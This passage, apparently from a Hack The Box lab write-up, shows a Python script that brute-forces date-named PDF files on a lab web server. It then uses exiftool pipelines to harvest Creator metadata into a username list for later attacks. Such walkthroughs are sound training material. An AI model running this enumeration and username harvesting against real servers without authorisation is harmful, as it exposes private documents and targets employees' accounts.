PDF File Naming Convention
The 2 PDF files available from the target web server appears to have a consistent naming structure, which suggests the possibility of a naming convention for PDF files; <YEAR>-<MONTH>-<DATE>-upload.pdf
Although fuzzing could be an efficient method to validate the theory, manually inspecting the entire annual cycle would be an exceedingly time-intensive process Therefore, I will automate the process by creating a simple script
Fuzzer
#!/usr/bin/python3
import requests, os
# Define the year for the PDF filename
year = 2020
# Define the range of months
months = range(1,13)
# Define the range of dates
dates = range(1,32)
# Loop through the months and dates
for m in months:
for d in dates:
# Create the filename using the year, month, and date
filename = f"{year}-{m:02d}-{d:02d}-upload.pdf"
# Create the URL for the file
url = f"http://dc.intelligence.htb/documents/{filename}"
# Send a GET request to the URL
response = requests.get(url)
# Check if the file exists on the server
if response.status_code == 404:
continue
elif response.status_code == 200:
# Check if the file already exists in the local directory
if os.path.exists(filename):
print(f"File '{filename}' already exists. Skipping download.")
continue
else:
with open(filename, 'wb') as f:
f.write(response.content)
print(f"Downloaded '{filename}' successfully.")This Python script automates the process of downloading PDF files by iterating through months and dates in the year 2020.
It constructs filenames based on the specified date format and attempts to download these files from a web server. If a file exists on the server (status code 200), it checks if it already exists locally and downloads it if not. The script helps efficiently retrieve PDFs from the server following a date-based naming convention.
Fuzzing
┌──(kali㉿kali)-[~/…/htb/labs/intelligence/pdf]
└─$ python3 fuzzing_pdf.py
Downloaded '2020-01-01-upload.pdf' successfully.
[...REDACTED...]
Downloaded '2020-12-30-upload.pdf' successfully.
┌──(kali㉿kali)-[~/…/htb/labs/intelligence/pdf]
└─$ ll *.pdf | wc -l
84Running the Python script confirms the theory as there were a total of 82 additional PDF files within the /documents directory of the web server
Reviewing the additional 82 PDF files one by one would also be a highly time-intensive task. Given the impracticality of reviewing these 82 files individually, I create a separate, user-friendly Python script to streamline and automate the process, ensuring efficiency and thoroughness.
Metadata
┌──(kali㉿kali)-[~/…/htb/labs/intelligence/pdf]
└─$ exiftool *.pdf | grep -i creator
Creator : William.Lee
Creator : Scott.Scott
Creator : Jason.Wright
Creator : Veronica.Patel
Creator : Jennifer.Thomas
Creator : Danny.Matthews
Creator : David.Reed
Creator : Stephanie.Young
Creator : Daniel.Shelton
Creator : Jose.Williams
Creator : John.Coleman
Creator : Jason.Wright
Creator : Jose.Williams
Creator : Daniel.Shelton
Creator : Brian.Morris
Creator : Jennifer.Thomas
Creator : Thomas.Valenzuela
Creator : Travis.Evans
Creator : Samuel.Richardson
Creator : Richard.Williams
Creator : David.Mcbride
Creator : Jose.Williams
Creator : John.Coleman
Creator : William.Lee
Creator : Anita.Roberts
Creator : Brian.Baker
Creator : Jose.Williams
Creator : David.Mcbride
Creator : Kelly.Long
Creator : John.Coleman
Creator : Jose.Williams
Creator : Nicole.Brock
Creator : Thomas.Valenzuela
Creator : David.Reed
Creator : Kaitlyn.Zimmerman
Creator : Jason.Patterson
Creator : Thomas.Valenzuela
Creator : David.Mcbride
Creator : Darryl.Harris
Creator : William.Lee
Creator : Stephanie.Young
Creator : David.Reed
Creator : Nicole.Brock
Creator : David.Mcbride
Creator : William.Lee
Creator : Stephanie.Young
Creator : John.Coleman
Creator : David.Wilson
Creator : Scott.Scott
Creator : Teresa.Williamson
Creator : John.Coleman
Creator : Veronica.Patel
Creator : John.Coleman
Creator : Samuel.Richardson
Creator : Ian.Duncan
Creator : Nicole.Brock
Creator : William.Lee
Creator : Jason.Wright
Creator : Travis.Evans
Creator : David.Mcbride
Creator : Jessica.Moody
Creator : Ian.Duncan
Creator : Jason.Wright
Creator : Richard.Williams
Creator : Tiffany.Molina
Creator : Jose.Williams
Creator : Jessica.Moody
Creator : Brian.Baker
Creator : Anita.Roberts
Creator : Teresa.Williamson
Creator : Kaitlyn.Zimmerman
Creator : Jose.Williams
Creator : Stephanie.Young
Creator : Samuel.Richardson
Creator : Tiffany.Molina
Creator : Ian.Duncan
Creator : Kelly.Long
Creator : Travis.Evans
Creator : Ian.Duncan
Creator : Jose.Williams
Creator : David.Wilson
Creator : Thomas.Hall
Creator : Ian.Duncan
Creator : Jason.PattersonI have also extracted potential users from the Creator field of metadata of all the PDF files
┌──(kali㉿kali)-[~/…/htb/labs/intelligence/pdf]
└─$ exiftool *.pdf | grep -i creator | cut -d ':' -f2 | tr '[:upper:]' '[:lower:]' | tr -d '[:blank:]' | sort -u > ../creator_users.txtI will sort them and save all to a file; creator_users.txt